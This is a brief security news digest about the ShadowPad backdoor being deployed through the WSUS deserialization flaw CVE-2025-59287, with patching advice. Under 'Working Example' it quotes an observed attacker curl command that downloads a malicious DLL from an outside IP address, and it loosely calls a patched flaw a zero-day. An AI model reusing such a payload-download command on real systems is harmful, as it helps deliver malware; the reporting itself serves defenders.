ShadowPad Malware Exploits WSUS Vulnerability for System Access

ShadowPad Malware Actively Exploits WSUS Vulnerability

The ShadowPad backdoor is being deployed through exploitation of CVE-2025-59287, a critical deserialization flaw in Microsoft’s Windows Server Update Services (WSUS). This allows attackers to gain full system access on affected servers, leveraging publicly available exploit code.

Why This Matters

Ideal security models assume prompt patching; however, many organizations struggle to maintain up-to-date systems due to complexity or resource constraints. The rapid weaponization of this WSUS vulnerability – just a month after patching – highlights the risk of zero-day exploits and the potential for widespread compromise, especially considering WSUS is a common component of enterprise infrastructure. The cost of a full system compromise can easily exceed six figures, factoring in remediation, downtime, and potential data breaches.

Key Insights

• CVE-2025-59287: Critical deserialization flaw in WSUS patched November 2025.
• ShadowPad/PlugX: A modular backdoor with roots dating back to 2015 commonly used by Chinese state-sponsored groups.
• Living off the Land: Attackers leverage legitimate tools like curl.exe and certutil.exe installed on target systems for download and execution of malware.

Working Example

# Example of command used to download ShadowPad (observed in attack)
curl --proto '=https' --tlsv1.2 -sS https://149.28.78[.]189:42306/ETDApix.dll -o ETDApix.dll

Practical Applications

• Use Case: Large enterprises utilizing WSUS for patch management are at elevated risk, requiring immediate patching and monitoring.
• Pitfall: Relying solely on automated patching without verifying successful deployment and application can leave systems vulnerable despite “patching” being reported as complete.

References:

• https://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html